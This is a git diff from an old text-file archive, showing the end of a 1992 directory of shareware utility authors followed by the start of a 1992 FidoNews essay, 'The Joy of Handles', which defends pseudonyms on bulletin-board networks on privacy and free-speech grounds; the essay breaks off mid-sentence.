utilities, nice +Brenner, Aaron VHARD DOS Utility Device driver makes floppies look hard +Riff, Joan DIAGS Diagnostic Diagnosis of DOS & hardware +McMillen, Ken (& Fried) CSCV Diagnostic Diagnostics for PCs +Fried, A. (& McMillen) CSCV Diagnostic Diagnostics, DOS +Schlafly, Roger DIALTHAT Comm Dial on-screen phone numbers, TSR +Gans, Eric DSIZ User Utility Directory lister/printer +Brenner, Aaron TODIR DOS Utility Directory quick change +Bordelon, Les ZSD DOS Utility Directory sorter, manipulator +Montgomery, Bob DS DOS Utility Directory structure viewer +Christensen, Ward RE-SOURCE CP/M Utility Dis-assembler +Pierson, Jacques SDF DOS Utility Disk formatter, fast +Cagley, Mark FREE Diagnostic Disk usage report, disk info +Christensen, Ward DU CP/M Utility Diskette manipulator +Bevilacqua, Paolo IDEDIAG Diagnostic Display IDE drive characteristics +Van den Brug, Arend SHOW Diagnostic Display information about the PC +Herring, Mark READCOM BBS Utility Door programming tool +Herring, Mark SENDCOM BBS Utility Door programming tool +Farley, Tim DJUST User Utility Double justify for 40/80 col. screens +Volking, Frederick ANIMATOR User Utility Draw animated cartoons, 40x80 pixels +Meyers, Mike DWSTMP PCB Utility Draw table of multi-events, colors +MacDonald, Michael DUP USER Utility Duplicate file finder for Robocomm +Lalonde, Jean DDUP DOS Utility Duplicate file finder, manager +Shields, Kelvin PYRO User Utility EGA fireworks display +McNamara, John EDITPTH DOS Utility Edit DOS PATH +Bovee, Bill EDENV DOS Utility Environment editor for DOS +Dunford, Christopher FAT Diagnostic FAT lister shows cluster usage +Willoughby, Bob FKEYS User Utility FKeys programmer (not F11/F12 though) +Zimmer, Tom FPC Programming FORTH system for IBM PCs +Williams, Don FFF User Utility FastFileFind can also search packets +Anon LIST (conv) OS/2 Utility File Reader, ported from PD program +Kihlken, Tom RECORDER User Utility File access monitor +McNamara, John BOPDIR DOS Utility File deleter, recursive +Ehrlich, David QDISK DOS Utility File directory, DOS manipulator +Esherick, Peter DC User Utility File directory, manipulator +McMains, Larry FINDIT DOS Utility File finder +Kaya, Raymond FFIND User Utility File finder finds all, wildcards ok +Christensen, Ward CDTO DOS Utility File finder goes to it +Behman, S. B. WHIZ User Utility File finder, very fast + + +19-Jun-92 19 + + + +Author Program Type Description +=============================================================================================== +Volking, Frederick FFA User Utility File finder, with options +ZIFF Communications Co. DIRMAGIC DOS Utility File handler +Graham, Keith FILEFINDER User Utility File handler +Petersen, Keith TO\FROMHARD CP/M Utility File handler +Hanlin, Tom ZDEL User Utility File handler +Mefford, Michael CO DOS Utility File manipulator +Pemberton, William CPY DOS Utility File manipulator +Dunford, Christopher FILER2 DOS Utility File manipulator +Rand, Dave NSWEEP CP/M Utility File manipulator +Mefford, Michael RN DOS Utility File manipulator +Blue Skies, Inc FIZZ DOS Utility File manipulator-Dos enhancer +Haupt, Lewis MOVE DOS Utility File manupulator +Bjorklund, Roland RECOVER CP/M Utility File recoverer +Cotton, Gene UNERAIS CP/M Utility File recovery for erased files +Steele, John SAVE CP/M Utility File recovery for lost files +Ledbetter, Keith WHEREIS DOS Utility File search utility +Lalonde, Jean SEARCHIN User Utility File searcher +Young, Gary BIGBURST CP/M Utility File splitter for floppies +Dingacci, M. SPLIT User Utility File splitter to fit floppies +Feldesman, Marc FP User Utility Financial Partner fin. management +Hockstatter, Christoph FDFORMAT DOS Utility Format command enhancement, complete +Buerg, Vern QDR DOS Utility Format on 2 drives & such +Tyler, Bert FRACTINT User Utility Fractal generator, Mandelbrot/Julia +Hapgood, Chris ALTRNFRN User Utility French keyboard for WordPerfect +Lindell, Michael CURVEFIT User Utility Geometry utility +Ying, Eugene PCPG User Utility Graphic symbols collection +Hartigan, Bruce FCCSTUDY User Utility Ham license Q&A inter-active tester +Dunford, Christopher DSKMON DOS Utility Harddrive access monitor +Garfinkle, Scott PDISK DOS Utility Harddrive partitioner +Unknown, Sergio DRVTYPES Database Harddrive types info file +Smith, Christopher RAMIT DOS Utility Hdisk access speed-up +Inkle', David HELP User Utility Help on-line for OCs +Mathews III, Ernest HIDEDIR DOS Utility Hide-unhide-find files & DIRs +Del Vecchio, Marty SWAP DOS Utility Himem swap lets a prog run other progs +Mead, Barry DRMHOUSE User Utility House plan designer +Petrakis, Peter WHATPORT Diagnostic I/O ports & interrupts reporter +Lou, John IBMTAB Database IBM AT technical reference tables +Morris, Aaron P. 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MM20B30 PROG Utility OS/2 Compiler +Gilliland, Jim OS2COMM OS/2 Utility OS/2 modem program +Parisien, Harry OFFLINE USER Utility Off-line reader for Mail Doors +Herring, Mark POE Comm Outside protocols for comm programs +Mason, Scott CHGPATH DOS Utility PATH editor doesn't wipe it +Lyngvig, Roland COREVIEW PC Utility PC memory scan and search +McNamara, John BUDMAN PCB Utility PCB D/L txt file splitter +McNamara, John CALLKILL PCB Utility PCB Del oversize caller log +Vostreys, Robert Q2PCB14 User Utility PCB and QBBS utility +Niswonger, Mark JUSTCALLED Sysop Utility PCB callers told who prior caller was +McNamara, John HSTUFF PCB Utility PCB file and stats report +Vostreys, Robert SQ2MSG User Utility PCB messagebase script files +Vostreys, Robert TXT2MSG User Utility PCB messagebase txt file dump +Vostreys, Robert MSG2TXT User Utility PCB messagebase, dump to txt files +McNamara, John ORIGIN PCB Utility PCB text search Door +McNamara, John HOTDOG PCB Utility PCB user maintenance to do it all +DeBuck, Cam OUTCOME BBS Utility PCB14.5 Send a message out the comport +Johnson, Ernie BADUSER SYSOP Utility PCBoard login door, for Hi/G'bye, etc. +Various Authors PROMPT User Utility PROMPTS and screen setups w/character +Keeves, Andy EXZIP User Utility Packet checker & re-packer, Scans +Day, Mark HARDPARK DOS Utility Park Hdrives & tell what track +Teasley, Charles TAIL-CT User Utility Pass parameters from a BAT +Banning, Noah YSNOOP User Utility Password security masquerading as DOS + + +19-Jun-92 21 + + + +Author Program Type Description +=============================================================================================== +Ottersbach, Larry LISTCNFG User Utility Patch Buerg's LIST for dialing, etc. +Doornik, Jurgen PATCH22 USER Utility Patch any file w/o debug, easy +Christensen, Ward UNNONDOS DOS Utility Patch byte #1 of FAT to F8, a cure +Kaya, Raymond FIX User Utility Patcher, file editor. Binary w/search +Haley, James USE DOS Utility Path changer, add and delete DIRS +McGreggor Jr, James DPATH DOS Utility Path datafiles in DOS +Walen, Frank AUTOPATH DOS Utility Path enlarger for DOS +Jelenc, Pierre NEWPS Printer Printer FFeed and LPT re-direct, TSR +Brothers, Hardin PRSET User Utility Printer command setter, TSR +Duet, Bob PRINT Printer Printer control commands for C-ITOH +Whitney, Kenneth MICROPRINT Printer Printer enhancer +Bly, Vincent SETPRN Printer Printer parameter reset +Kuhman, Robert C. HEADLINE CP/M Utility Printer utility +Vostreys, Robert LANG User Utility ProDoor utility +Fowler, Ron MLOAD CP/M Utility Program loader +Brown, Reid HERCULES Programming Programming aids +Leon, Stephen DB3MNGER User Utility Property manager for DB3 +Evers, Dave LIBMGR Programming QB library manager +Evers, Dave WINDOW TOOLS Programming QB toolbox routines +Keller, Dale QHELP USER Utility Qedit quick help shell +Hoffman, Robert QPACK Sysop Utility Qmail Deluxe packer shell +Moore, Dan HST20 Comm Qmodem USR\HST set-up script +McCullough, Clifford RAMHAM Diagnostic RAM chip checker +Weisz, Jim RAMTEST Diagnostic RAM chip checker +Kohtala, Marko SRDISK DOS Utility RAMdisk for XMS memory, re-Sizeable +Graham, Keith CPORT Comm Re-direct I/O Ports, TSR +Wilkerson, Clarence READCPM User Utility Read Zenith CP/M disks in PC-DOS +Graham, Keith FMAC User Utility Readmac file viewer +Mefford, Michael TOUCH DOS Utility Redate DOS file date/time +Genusa, Stephen ZIPSTAMP User Utility Redate Zipfile to latest file inside +Haff, Gordon NEWDATE User Utility Redate file to today's date +Conn, Richard ZCPR3 CP/M Utility Replacement/enhancer for CP/M +Kellen, Tom EFREE DOS Utility Report environment size and free bytes +Gruen, Andreas RX WIN3 Utility Reverse resource compiler for WIN3 +Pearson, Jimmy PARASCAN User Utility Sanity Restorer +Standley, Jim TDSNAP User Utility Screen capture +Volking, Frederick TINYGRAB User Utility Screen capture, TSR color/mono +Volking, Frederick TINYMOD User Utility Screen capture, edit output +Davis, Stephen R. CUTPASTE User Utility Screen saver +Tansky, Ron (upgrader) ZENO DOS Utility Screen write speed utility +Lazarus, M ZENO DOS Utility Screen write speed utility +Tauck, Eric TODDY User Utility Scroll-back using 0AH, command line +Lazo, Charles WASO User Utility Scrollback TSR using EMS +McNamara, John MACKILL DOS Utility Search for files & kill them +Lewis, Dan SETVAR DOS Utility Sets environment variables +Sink Jr, Robert ROINFO Database Setup info for harddrives +Kaya, Raymond RVIEW User Utility Shell for ARC/ZIP/LZH/LZS/PAK/ZOO+lites +Kaya, Raymond DIRX User Utility Shell to manage PKLITE/LZEXE/DIET/etc. +Grunin, Eric DOUBLEDIR,DD DOS Utility Show 2 directories side by side +Burtner, Carl SILENCE DOS Utility Silence beepy programs +Almy, Tom NNANSI DOS Utility So far the fastest ANSI replacement +Krieg, Mark BULK DBase Utility Sorts .DBF files for bulk mailing + + +19-Jun-92 22 + + + +Author Program Type Description +=============================================================================================== +Tutelman, Dave HERCBIOS DOS Utility Speed writing for text\graphics +Nault, Mike SPLITTER User Utility Split long files +Winkel, Rich MSPOOL User Utility Spooler for up to 4 printers at once +Leirer, Von SELECT-A-COLL Database Srch college list by weighted criteria +Hoff, Irvin M. FIND CP/M Utility String searcher +Vostreys, Robert DUMPANSI User Utility Strip ANSI from files +Brown, Ken STRIPZIP DOS Utility Strip out comments in ZIPs +McNamara, John HCOMP User Utility Strip unwanted lines from files +Doman, Daniel 3CT DOS Utility Sub-dir census taker, sizes & totals +Nhiew, Duy-Minh 3DSUR User Utility Surface plotter +Buerg, Vern SWAPNAME User Utility Swap two file names. All-time great. +Almy, Tom RESTART User Utility System configuration management +Crown Software SHOWME Diagnostic System equipment lister, net capable +Thomson, Jim SCAN Diagnostic System info scanner, very detailed +Rossmann, Andrew INFOPLUS Diagnostic System info with much more, like SYSID +Grant, Steve SYSID Diagnostic System information, 12 screens +Brunner, Andy SYSACT OS/2 Utility System perf. monitor +Smith, Rich EZDIALER Comm TELIX 3.0 dialing scripts for PCP +Turbopower Software POPDOS DOS Utility TSR allows drop to DOS from any program +Ferris, Lane STAYRES Programmer TSR code, generic +Turton, Paul FLMK & FLUSH DOS Utility TSR managers +Gans, Eric RESPRO DOS Utility TSR remover +Nieves, David TAGMASTER User Utility Tagline manager for QMDeluxe/EZ +Nieves, David TAGSTEAL User Utility Tagline stealer for QMDeluxe +De Haan, Bill TLXSORT User Utility Telix 2.xx phone number sorter +Horn, Daniel HOST3 Comm Telix 3.xx expanded HOST mode +Miller, Craig S. SPHM COMM Utility Telix SALT programming manl, Hypertext +Brenner, Steven AUTO-GEN Comm Telix SALT scripts for automating +Madison, W. G. DSKBUF Diagnostic Test buffers for optimum setting +Sydex FDRPM Diagnostic Test floppys to show RPM +Wang, Kevin SST Diagnostic Test for PC system speed +Gazelle Systems, DMATEST Diagnostic Tests the DMA chip +Berg-Sonne, Anker SEDT EDITOR OS/2 Utility Text ed for OS/2, Atari, DEC, DOS, etc. +Andrews, Tony STEVIE OS/2 Utility Text ed like vi for OS/2, atari, etc. +Dunford, Christopher FGREP User Utility Text search, fast, SHARE compatible +McNamara, John HOWLONG User Utility Time program execution +Johnson, Richard JMODEM Comm Transfer protocol +Henderson, Thom SEALINK V1.2 Comm Transfer protocol +Vostreys, Robert TRANSLAT User Utility Translate IBM extended to ASCII +Collins, Chris TCCLIB2 Programmer Turbo C function library. Ver2 is free +Baldwin, Dave TDEBUG Programming Turbo Pascal de-bugger +Foley, Brian TPE Programming TurboPower Software programmer's editor +Azlan Corp. AZLAN User Utility UNIX Sys V commands for DOS +Kou UNLZEXE User Utility Un-compress LZEXE-squeezed files +Bellard, Fabrice UNPACK User Utility Unpack Microsoft EXEPACK files +Keeves, Andy EXZTEST Sysop Utility Verify uploaded files on PCB 14.5 +Kaya, Raymond DBV USER Utility View DBase files w/o having DBase +Buerg, Vern FV DOS Utility View filenames\attributes in packets +Lloyd, Robert WORLD User Utility View the Earth +Buerg, Vern ZIPV User Utility Views filenames & comments in a ZIP +Brown, Eric TIMEOUT User Utility WAIT program for BAT files +Johns, Ray NOBIT User Utility WS file editor, remove bit 7 + + +19-Jun-92 23 + + + +Author Program Type Description +=============================================================================================== +Martin, C. F. MEMSCAN DIAGS Utility Watch memory during program execution +Teknowledge CWINE Database+ Wine guide, California only +Klee, Albert KLEE UTILS User Utility Word processing & other utilities +Fowler, Ron PROLINK CP/M Utility Z-80 Linker +Kaya, Raymond ZFV User Utility ZIP examiner, very detailed, unique +Smith, Sam UNZIP User Utility Zipfile extractor, small & portable +Smith, Gary w/Kennon PCCZmodem Comm Zmodem implementation +Kennon, Drue w/Smith PCCZmodem Comm Zmodem implementation + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +19-Jun-92 24 diff --git a/textfiles.com/computers/handles.txt b/textfiles.com/computers/handles.txt new file mode 100644 index 00000000..9bdcfd04 --- /dev/null +++ b/textfiles.com/computers/handles.txt @@ -0,0 +1,755 @@ +From -- + +F I D O N E W S -- | Vol. 9 No. 9 (2 March 1992) + The newsletter of the | + FidoNet BBS community | Published by: + _ | + / \ | "FidoNews" BBS + /|oo \ | (415)-863-2739 + (_| /_) | FidoNet 1:1/1 + _`@/_ \ _ | Internet: + | | \ \\ | fidonews@fidonews.fidonet.org + | (*) | \ )) | + |__U__| / \// | Editors: + _//|| _\ / | Tom Jennings + (_/(_|(____/ | Tim Pozar + (jm) | +----------------------------+--------------------------------------- +-------------------------------------------------------------------- + + + +The Joy of Handles +Mahatma Kane Jeeves +101/138.8 +David Lescohier +101/138.0 + + + + + THE JOY OF HANDLES + ------------------ + or: + EVERYTHING YOU ALWAYS WANTED TO KNOW ABOUT ME + (but have no right to ask) + -------------------------- + + + * * * * * + + +We should never so entirely avoid danger as to appear +irresolute and cowardly. But, at the same time, we should +avoid unnecessarily exposing ourselves to danger, than +which nothing can be more foolish. [Cicero] + + + * * * * * + + + +Do you trust me? + +If you participate in computer conferencing, and you use +your real name, then you'd better. + +"Why?", you ask. "What can you do with my name?" To start +with, given that and your origin line, I can probably look +you up in your local phone book, and find out where you +live. Even if you are unlisted, there are ways to locate +you based on your name. If you own any property, or pay any +utility bills, your address is a matter of public record. +Do you have children in the public schools? It would be +easy to find out. But that's just the beginning. + +Former Chairman of the U.S. Privacy Protection Commission +David F. Linowes, in his book "Privacy in America" (1989), +writes of New York private investigator Irwin Blye: + + "Challenged to prove his contention that, given a little + time and his usual fee, he could learn all about an + individual without even speaking with him, Blye was + presented with a subject -- a New Jersey + newspaperman.... The result was a five-page, single- + spaced, typed report which documented, though not always + accurately, a wide sweep of the journalist's past, and + was detailed to the point of disclosing his father's + income before his retirement." + +Who am I? If I don't post, you might not even know I exist. +I could be on your local Police Department, or an agent +working with the IRS, or some federal law-enforcement +agency. I could be a member of some fanatical hate group, +or criminal organization. I might even be a former Nixon +White-House staffer! + +I could be that pyromaniacal teenager you flamed last +weekend, for posting a step-by-step description of how he +made plastic explosive in his high-school chem lab. He +seemed kind of mad. + +But you're an upstanding citizen; you have nothing to hide. +So why not use your name on the nets? Trust me. There's +nothing to worry about. + +Is there? + + + + * * * * * + + + + WHAT'S ALL THIS BROUHAHA? + ------------------------- + + + Stupidity is evil waiting to happen. [Clay Bond] + + +Not long ago in Fidonet's BCSNET echo (the Boston Computer +Society's national conference), the following was posted by +the conference moderator to a user calling himself "Captain +Kirk": + + "May we ask dear Captain Kirk that it would be very + polite if you could use your real name in an echomail + conference? This particular message area is shared + with BBS's all across the country and everyone else is + using their real name. It is only common courtesy to + do so in an echomail conference." + +One of us (mkj) responded with a post questioning that +policy. Soon the conference had erupted into a heated +debate! Although mkj had worried that the subject might be +dismissed as trivial, it apparently touched a nerve. It +brought forth debate over issues and perceptions central to +computer communications in general, and it revealed profound +disparities in fundamental values and assumptions among +participants. + +This article is a response to that debate, and to the +prevailing negative attitudes regarding the use of handles. +Handles seem to have a bad reputation. Their use is +strangely unpopular, and frequently forbidden by network +authorities. Many people seem to feel that handles are rude +or dishonest, or that anyone wishing to conceal his or her +identity must be up to no good. It is the primary purpose +of this article to dispel such prejudices. + +Let us make one thing perfectly clear here at the outset: We +do NOT challenge the need or the right of sysops to know the +identities of their users! But we do believe that a sysop +who collects user names has a serious responsibility to +protect that information. This means making sure that no +one has access to the data without a legal warrant, and it +certainly means not pressuring users to broadcast their real +names in widespread public forums such as conferences. + + + + * * * * * + + + + SO YOU WANT TO BE A STAR? + ------------------------- + + + John Lennon died for our sins. [anonymous] + + +Andy Warhol said that "In the future, everyone will be +famous for fifteen minutes". The computer nets, more than +any other medium, lend credibility to this prediction. A +network conference may span the globe more completely than +even satellite TV, yet be open to anyone who can afford the +simplest computer and modem. Through our participation in +conferencing, each of us becomes, if only briefly, a public +figure of sorts -- often without realizing it, and without +any contemplation of the implications and possible +consequences. + + +Brian Reid (reid@decwrl.DEC.COM) conducts and distributes +periodic surveys of Usenet conference readership. His +statistical results for the end of 1991 show that of the +1,459 conferences which currently make up Usenet, more than +fifty percent have over 20,000 readers apiece; the most +popular conferences are each seen by about 200,000 readers! +Mr. Reid's estimate of total Usenet readership is nearly TWO +MILLION people. + +Note that Mr. Reid's numbers are for Usenet only; they do +not include any information on other large public nets such +as RIME (PC-Relaynet), Fido, or dozens of others, nor do +they take into account thousands of private networks which +may have indirect public network connections. The total +number of users with access to public networks is unknown, +but informed estimates range to the tens of millions, and +the number keeps growing at an amazing pace -- in fact, the +rate of growth of this medium may be greater than any other +communications medium in history. + +The special problems and risks which arise when one deals +with a large public audience are something about which most +computer users have little or no experience or +understanding. Until recently, those of us involved in +computer conferencing have comprised a small and rather +elite community. The explosion in network participation is +catching us all a little unprepared. + +Among media professionals and celebrities, on the other +hand, the risks of conducting one's business in front of a +public audience are all too familiar. If the size of one's +audience becomes sufficiently large, one must assume that +examples of virtually every personality type will be +included: police and other agents of various governments, +terrorists, murderers, rapists, religious fanatics, the +mentally ill, robbers and con artists, et al ad infinitum. +It must also be assumed that almost anything you do, no +matter how innocuous, could inspire at least one person, +somewhere, to harbor ill will toward you. + +The near-fatal stabbing of actress Theresa Saldana is a case +in point. As she was walking to her car one morning near her +West Hollywood apartment, a voice behind her asked, "Are you +Theresa Saldana?"; when she turned to answer, a man she had +never seen before pulled out a kitchen knife and stabbed her +repeatedly. + +After her lengthy and painful recovery, she wrote a book on +the experience ("Beyond Survival", 1986). In that book she +wrote: + + [pg 12] "... Detective Kalas informed me that the + assailant, whom he described as a Scottish drifter, had + fixated upon me after seeing me in films." + + [pg 28] "... it was through my work as an actress that + the attacker had fixated on me. Naturally, this made + me consider getting out of show business ..." + + [pg 34] "For security, I adopted an alias and became + 'Alicia Michaels.' ... during the months that followed + I grew so accustomed to it that, to this day, I still + answer reflexively when someone calls the name Alicia!" + +Or consider the fate of Denver radio talk show host Alan +Berg, who in 1984 died outside his home in a hail of +gunfire. Police believe he was the victim of a local neo- +nazi group who didn't like his politics. + +We are reminded of the murders of John Lennon and Rebecca +Shaffer; the Reagan/Hinckley/Foster incident; and a long +string of other "celebrity attacks" of all sorts, including +such bizarre events as the occupation of David Letterman's +home by a strange woman who claimed to be his wife! There is +probably no one in public life who doesn't receive at least +the occassional threatening letter. + +Of course, ordinary participants in network conferencing may +never attract quite the attention that other types of +celebrities attract. But consider the following, rather less +apocalyptic scenarios: + + -- On Friday night you post a message to a public + conference defending an unpopular or controversial + viewpoint. On Monday morning your biggest client + cancels a major contract. Or you are kept up all + night by repeated telephone calls from someone + demanding that you "stop killing babies"! + + -- You buy your teenage son or daughter a computer and + modem. Sometime later you find your lawn littered + with beer bottles and dug up with tire marks, or + your home vandalized or burglarized. + + -- One day you are nominated to the Supreme Court. Who + are all these strange people on TV claiming to be + your friends? How did that fellow know your position + on abortion? Your taste in GIFs? + +Celebrities and other professional media personalities +accept the risks and sacrifices of notoriety, along with the +benefits, as part of their chosen careers. Should computer +conference participants be expected to do the same? And who +should be making these decisions? + + * * * * * + + + + OTHER MEDIA + ----------- + + + When thou art at Rome, do as they do at Rome [Cervantes] + + +Older media seem to address the problems of privacy very +differently than computer media, at least so far. We are +not aware of ANY medium or publication, apart from computer +conferencing, where amateur or even most professional +participants are required to expose their true names against +their will. Even celebrities frequently use "stage names", +and protect their addresses and phone numbers as best they +can. + +When a medium caters specifically to the general public, +participants are typically given even greater opportunities +to protect their privacy. Television talk shows have been +known to go so far as to employ silhouetting and electronic +alteration of voices to protect the identities of guests, +and audience members who participate are certainly not +required to state their full names before speaking. + +The traditional medium most analogous to computer +conferencing may be talk radio. Like conferencing, talk +radio is a group discussion and debate medium oriented +toward controversy, where emotions can run high. Programs +often center around a specific topic, and are always run by +a "host" whose role seems analogous in many respects to that +of a conference moderator. It is therefore worth noting +that in talk radio generally, policy seems to be that +callers are identified on the air only by their first names +(unless of course they volunteer more). + +Finally, of course, authors have published under "pen names" +since the dawn of publishing, and newspapers and magazines +frequently publish letters to the editor with "name and +address withheld by request" as the signature line. Even +founding fathers Alexander Hamilton, James Madison and John +Jay, in authoring the seminal Federalist Papers in 1787 for +publication in the Letters columns of various New York City +newspapers, concealed their identities behind the now-famous +psuedonym "Publius". + +What would you think if someone called a radio talk show +demanding to know the identity of a previous caller? Such a +demand would undoubtedly be seen as menacing and +inappropriate in that context. Yet that same demand seems +to arise without much challenge each time a handle shows up +in a computer conference. The authors of this article feel +that such demands should always be looked upon as +suspicious, and that it would be beneficial for moderators +to take upon themselves the responsibility of making sure +that besieged handle-users are aware of their right to +refuse such inappropriate demands. + +It is reasonable to assume that privacy policies in +traditional media are the result of hard-won wisdom gained +from long experience. Are we so arrogant that we cannot +learn from others? It is not hard to imagine the sorts of +problems and experiences which shaped these policies in the +old media. Will we have to wait for similar problems to +occur on the computer networks before we learn? + + + + * * * * * + + + + PRIVACY AND SURVEILLANCE + ------------------------ + + + In an effort to identify people who fail to file tax + returns, the Internal Revenue Service is matching + its files against available lists of names and + addresses of U.S. citizens who have purchased + computers for home use. The IRS continues to seek + out sources for such information. This information + is matched against the IRS master file of taxpayers + to see if those who have not filed can be + identified. + [COMPUTERWORLD, Sept. 1985] + + Date: Thu, 23 May 91 11:58:07 PDT + From: mmm@cup.portal.com + Subject: The RISKS of Posting to the Net + - + I just had an interesting visit from the FBI. It + seems that a posting I made to sci.space several + months ago had filtered through channels, caused the + FBI to open (or re-open) a file on me, and an agent + wanted to interview me, which I did voluntarily... + I then went on to tell him about the controversy + over Uunet, and their role in supplying archives of + Usenet traffic on tape to the FBI... + [RISKS Digest] + + Also frequent are instances where computers are + seized incident to an unrelated arrest. For + example, on February 28, 1991, following an arrest + on charges of rape and battery, the Massachusetts + state and local police seized the suspect's computer + equipment. The suspect reportedly operated a 650- + subscriber bulletin board called "BEN," which is + described as "geared largely to a gay/leather/S&M + crowd." It is not clear what the board's seizure is + supposed to have accomplished, but the board is now + shut down, and the identities and messages of its + users are in the hands of the police. + [CONSTITUTIONAL, LEGAL, AND ETHICAL + CONSIDERATIONS FOR DEALING WITH ELECTRONIC + FILES IN THE AGE OF CYBERSPACE, Harvey A. + Silverglate and Thomas C. Viles] + + +Most of us have been brought up to be grateful for the fact +that we live in a nation where freedom is sacred. In other +countries, we are told as children, people are afraid to +speak their minds for fear they are being watched. Thank +God we live in America! + +It would surprise most of us to learn that America is +currently among the premiere surveillance nations in the +world, but such, sadly, is indeed the case. Our leadership +in technology has helped the U.S. government to amass as +much information on its citizens as almost any other nation +in history, totalitarian or otherwise. And to make matters +worse, a consumer surveillance behemoth has sprung up +consisting of huge private data-collection agencies which +cater to business. + +As Evan Hendricks, editor of "Privacy Times" (a Washington +D.C.-based newsletter) has put it: "You go through life +dropping bits and pieces of information about yourself +everywhere. Most people don't realize there are big vacuum +cleaners out there sucking it all up." [Wall Street +Journal, March 14, 1991]. + +To get an idea of how much of your privacy has already been +lost, consider the bits and pieces of information about +yourself which are already available to investigators, and +how thoroughly someone might come to know you by these clues +alone. + +A person's lifestyle and personality are largely described, +for example, by his or her purchases and expenses; from your +checking account records -- which banks are required by law +to keep and make available to government investigators -- a +substantial portrait of your life will emerge. Credit card +records may reveal much of the same information, and can +also be used to track your movements. (In a recent case, +"missing" Massachusetts State Representative Timothy O'Leary +was tracked by credit-card transactions as he fled across +the country, and his movements were reported on the nightly +news!) + +Then there are your school records, which include IQ and +other test results, comments on your "socialization" by +teachers and others, and may reveal family finances in great +detail. Employment and tax records reveal your present +income, as well as personal comments by employers and co- +workers. Your properties are another public record of your +income and lifestyle, and possibly your social status as +well. Telephone billing records reveal your personal and +business associations in more detail. Insurance records +reveal personal and family health histories and treatments. + +All of this information is commonly accessed by government +and private or corporate investigators. And this list is +far from exhaustive! + +Now consider how easily the computer networks lend +themselves to even further erosions of personal privacy. The +actual contents of our mail and telephone traffic have up to +now been subjected to deliberate scrutiny only under +extraordinary conditions. This built-in safety is due +0primarily to the difficulty and expense of conducting +surveillance in these media, which usually requires extended +human intervention. But in the medium of computer +communications, most surveillance can be conducted using +automated monitoring techniques. Tools currently available +make it possible and even cost-effective for government and +other interests to monitor virtually everything which +happens here. + +Why would anyone want to monitor network users? It is well +documented that, throughout the 1960s and 1970s, the FBI and +other agencies of government, in operations such as the +infamous COINTELPRO among others, spent a great deal of time +and effort collecting vast lists of names. As Computer +Underground Digest moderators Jim Thomas and Gordon Meyer +recalled in a recent commentary (CuD #3.42): + + "A 1977 class action suit against the Michigan State + Police learned, through FOIA requests, that state and + federal agents would peruse letters to the editor of + newspapers and collect clippings of those whose politics + they did not like. These news clippings became the basis + of files on those persons that found there way into the + hands of other agencies and employers." + +To get onto one of these government "enemies" lists, you +often needed to do nothing more than telephone an +organization under surveillance, or subscribe to the "wrong" +types of magazines and newspapers. Groups engaged in +political activism, including environmental and women's +rights organizations, were commonly infiltrated. The sort +of investi-gative reporting which uncovered these lists and +surveillances back in the '60s and '70s is now rare, but +there is little reason to assume that such activities have +ceased or even slowed. In fact, progressive computerization +of local police LEIU activities (Law Enforcement +Intelligence Units, commonly known as "red squads") suggests +that such activities may have greatly increased. + +Within the realm of computer conferencing especially, there +is ample reason to believe that systematic monitoring is +being conducted by government and law-enforcement +organizations, and perhaps by other hostile interests as +well. In a recent issue of Telecom Digest +(comp.dcom.telecom), Craig Neidorf (knight@EFF.ORG) reported +on the results of a recent Freedom of Information Act +request for documents from the Secret Service: + + " ... The documents also show that the Secret Service + established a computer database to keep track of + suspected computer hackers. This database contains + records of names, aliases, addresses, phone numbers, + known associates, a list of activities, and various + [conference postings] associated with each individual." + +But the privacy issues which surround computer +communications go far beyond the collection of user lists. +Both government and industry have long pursued the elusive +grail of personality profiling on citizens and consumers. Up +to now, such ambitions have been restrained by the practical +difficulty and expense of collecting and analyzing large +amounts of information on large numbers of citizens. But +computer communications, more than any other technology, +seems to hold out the promise that this unholy grail may +finally be in sight. + +To coin a phrase, never has so much been known by so few +about so many. The information commonly available to +government and industry investi-gators today is sufficient +to make reliable predictions about our personalities, +health, politics, future behavior, our vulnerabilities, +perhaps even about our innermost thoughts and feelings. The +privacy we all take for granted is, in fact, largely an +illusion; it no longer exists in most walks of life. If we +wish to preserve even the most basic minimum of personal +privacy, it seems clear that we need to take far better care +on the networks than we have taken elsewhere. + + + + * * * * * + + + + FREEDOM + ------- + + + Human beings are the only species with a history. + Whether they also have a future is not so obvious. + The answer will lie in the prospects for popular + movements, with firm roots among all sectors of the + population, dedicated to values that are suppressed + or driven to the margins within the existing social + and political order... + [Noam Chomsky] + + +In your day-to-day social interactions, as you deal with +employers, clients, public officials, friends, acquaintances +and total strangers, how often do you feel you can really +speak freely? How comfortable are you discussing +controversial issues such as religion, taxes, politics, +racism, sexuality, abortion or AIDS, for example? Would you +consider it appropriate or wise to express an honest opinion +on such an issue to your boss, or a client? To your +neighbors? + +Most of us confine such candid discussions to certain +"trusted" social contexts, such as when we are among our +closest friends. But when you post to a network conference, +your boss, your clients, and your neighbors may very well +read what you post -- if they are not on the nets today, +they probably will be soon, as will nearly everyone. + +If we have to consider each post's possible impact on our +social and professional reputations, on our job security and +income, on our family's acceptance and safety in the +community, it could be reckless indeed to express ourselves +freely on the nets. Yet conferences are often geared to +controversy, and inhibitions on the free expression of +opinions can reduce traffic to a trickle, killing off an +important conference topic or distorting a valuable sampling +of public opinion. + +More important still is the role computer networks are +beginning to play in the free and open dissemination of news +and information. Democracy is crippled if dissent and +diversity in the media are compromised; yet even here in the +U.S., where a "free press" is a cherished tradition, the +bulk of all the media is owned by a small (and ever- +shrinking) number of corporations, whose relatively narrow +culture, interests and perspec-tives largely shape the +public perception. + +Computer communication, on the other hand, is by its nature +very difficult to control or shape. Its resources are +scattered; when one BBS goes bust (or is busted!), three +others spring up in its place. The natural resiliency of +computer communications (and other new, decentral-ized +information technologies such as fax, consumer camcorders +and cheap satellite links) is giving rise to a new brand of +global "guerrilla journalism" which includes everyone, and +defies efforts at suppression. + +The power and value of this new journalistic freedom has +recently shown itself during the Gulf War, and throughout +Eastern Europe and the Soviet Union, as well as within the +U.S. Just think of the depth and detail of information +available on the nets regarding the Secret Service's recent +"Operation Sundevil" and associated activities, compared to +the grossly distorted, blatantly propagandistic coverage of +those same activities given to the general public through +the traditional media. + +Historically, established power and wealth have seldom been +disposed to tolerate uncontrolled media, and recent events +in this country and elsewhere show that computer media are +sometimes seen as threats to established interests as well. +To understand the role of handles in this context, it is +useful to note the flurries of anti-handle sentiment which +have arisen in the wake of crackdowns such as Sundevil, or +the Tom Tcimpidis raid in the early 1980s. Although few +charges and fewer convictions have typically resulted from +such operations, one might be tempted to speculate that the +real purposes -- to 